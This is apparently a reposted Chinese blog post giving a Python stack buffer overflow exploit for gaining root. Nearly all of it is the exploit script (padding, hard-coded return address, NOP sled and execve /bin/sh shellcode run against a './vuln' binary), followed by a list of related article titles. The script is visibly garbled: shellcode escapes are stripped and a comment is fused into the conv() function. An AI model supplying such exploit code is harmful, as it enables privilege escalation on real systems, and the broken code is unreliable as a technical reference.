Python經典棧緩衝區溢位獲取root許可權
版權宣告:轉載請註明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396339
是Python2還是3我給忘記了,大家自己試試吧。
#!/usr/bin/env python
#-*-coding:utf-8-*-
#exp.py
import struct
from subprocess import call
#Stack address where shellcode is copied.
ret_addr = 0xbffff1d0
#Spawn a shell
#execve(/bin/sh)
scode = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"
#endianess convertion
def conv(num):
return struct.pack("<I",numnk + RA + NOP`s + Shellcode
buf = "A" * 268
buf += conv(ret_addr)
buf += "x90" * 100
buf += scode
print "Calling vulnerable program"
call(["./vuln", buf])
相關文章
- pwntools緩衝區溢位與棧沒對齊
- 緩衝區溢位實驗
- 緩衝區溢位小程式分析
- Android手機獲取Root許可權Android
- Redis緩衝區溢位及解決方案Redis
- Mac osx下獲取root使用者許可權Mac
- IMail SMTP 緩衝區溢位漏洞 (APP,缺陷) (轉)AIAPP
- MikroTik RouterOS 中發現了可遠端利用的緩衝區溢位漏洞ROS
- 緩衝區溢位漏洞那些事:C -gets函式函式
- 緩衝區溢位漏洞的原理及其利用實戰
- 一個緩衝區溢位漏洞的簡易教程
- 淺談C#緩衝區溢位的祕密C#
- 駭客中級技術--緩衝區溢位攻擊(轉)
- Mac OS X 下獲取root使用者許可權圖解Mac圖解
- 緩衝區溢位攻擊初學者手冊(更新版)
- 通過可寫檔案獲取 Linux root 許可權的 5 種方法Linux
- Android應用程式獲得root許可權Android
- Mac 在命令列中獲得Root許可權Mac命令列
- Android系統許可權和root許可權Android
- NetGear路由器可以通過命令注入獲取ROOT許可權路由器
- [提權禁區] SQL語句利用xp_cmdshell獲取許可權SQL
- MAC 開啟root許可權Mac
- CVE-2010-2883-CoolType.dll緩衝區溢位漏洞分析
- CMD.EXE中dir超長字串緩衝區溢位原理學習字串
- Atitit godaddy 檔案許可權 root許可權設定Go
- 取消 root 級管理員的 root 許可權
- win10管理員許可權怎麼獲取 win10管理員許可權獲取的方法Win10
- 防溢位提升許可權攻擊解決辦法(轉)
- [PolicyException: 無法獲取所需的許可權。]Exception
- Oracle 使用者許可權獲取ProcedureOracle
- CVE-2010-2883Adobe Reader和Acrobat CoolType.dll棧緩衝區溢位漏洞分析BAT
- PostgreSQL物件許可權如何在後設資料中獲取-許可權解讀、定製化匯出許可權SQL物件
- ASLR 是如何保護 Linux 系統免受緩衝區溢位攻擊的Linux
- Win8.1許可權獲取設定教程
- Win8.1許可權獲取設定技巧
- 連線使用者獲取許可權資訊
- StackOverFlowError(棧溢位)Error
- win10如何獲取檔案訪問許可權_win10怎麼獲取許可權看資料夾Win10訪問許可權